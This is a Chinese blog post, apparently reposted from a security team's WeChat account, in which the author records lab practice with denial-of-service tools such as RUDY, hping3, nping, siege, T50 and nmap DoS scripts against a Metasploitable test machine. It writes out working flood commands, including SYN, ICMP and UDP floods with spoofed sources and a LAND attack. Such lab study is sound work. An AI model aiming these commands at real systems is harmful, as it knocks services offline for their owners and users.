拒绝服务——一些工具

admin 2022年11月26日21:55:05评论68 views字数 1871阅读6分14秒阅读模式


拒绝服务——一些工具


前言

本节学习拒绝服务工具

  • 有些是正常工具

  • 有些是黑客工具:https://www.freebuf.com/sectool/36545.html

黑客工具
就只了解
不做实践了
怕一不小心搞点恶意代码下来

1、Rudy

  • 慢速应用层HTTP POST攻击,与slowhttptest原理相同

  • 每次只传输一个字节的数据

  • 美剧黑客军团中曾提到此攻击手段

  • 攻击有表单WEB页面,攻击时需指定攻击的参数名称

  • 官网https://sourceforge.net/projects/r-u-dead-yet/

目标机metasploitable
IP:192.168.1.119
准备对DVWA进行攻击

攻击机kali
对rudy的配置文件rudeadyet.conf进行修改
如图所示
拒绝服务——一些工具
主要是url和username

./r-u-dead-yet-v2.2.py #进行攻击#DVWA服务器停止响应

2、hping3

之前主动扫描时用过
几乎可以定制发送任何 TCP/IP 数据包,用于测试 FW、端口扫描、性能测试
所以自然可以用来进行DoS攻击

#syn_flood 攻击hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.119 #-c连接数,-d数据段大小,-Ssyn标记,-wwindow大小,-p是端口hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.119 #-Ppush标记#tcp_flood 攻击hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.119 #TCP的标记都标满,就是消耗资源#icmp_flood 攻击hping3 -q -n -a 1.1.1.1 --icmp -d 200 --flood 192.168.1.119 #-q安静模式,-n不解析域名,-a伪造源地址#udp_flood 攻击hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 192.168.1.119

3、LAND 攻击

特殊种类的 SYN Flood 攻击
源地址和目的地址都是靶机IP,受害者和自己完成三次握手

hping3 -n -a 192.168.1.119 -S -d 100 -p 80 --flood 192.168.1.119

4、nping

在nmap里的子命令
TCP 全连接 DoS 攻击

nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.1.119nping --echo-client "public" echo.nmap.org --udp #查公网 IP,这个与DoS没关系,但有趣


5、Siege

http/https 压力测试工具,模拟多个用户并发访问请求
压力大了,就是DoS了

siege -g http://192.168.1.119 #-g获取banner,类似ncsiege -i -c 1000 http://192.168.1.119 -A siegehttp #-i是internet模式,-c是用户数量,-A是http头#同时攻击多个 url ,使用 -f 调用字典文件/etc/siege/urls.txtsiege -i -c 1000 #这样也会调用字典文件

6、T50

网络压力测试,即TCP/UDP等

t50 192.168.1.119 --flood --turbo -S --protocol TCP --dport 80t50 192.168.1.119 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22


7、nmap

扫描脚本里有DoS


cd /usr/share/nmap/scripts/cat script.db | grep dos #找dos的脚本nmap -p445 --script=smb-vuln-regsvc-dos.nse 192.168.1.119

结语

至此,拒绝服务学习告一段落
还有好些黑客开发的专门用于DoS的工具
在开头的freebuf网址里有
但笔者没试过,怕出事

拒绝服务的防御
说白了就是填补漏洞和拼资源

之后学习免杀






   红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。其核心团队于2022年转型于信息安全研究院,并为政企提供安全服务与技术支持。


© Honker Security Commando


原文始发于微信公众号(中龙 红客突击队):拒绝服务——一些工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月26日21:55:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   拒绝服务——一些工具https://cn-sec.com/archives/1418991.html

发表评论

匿名网友 填写信息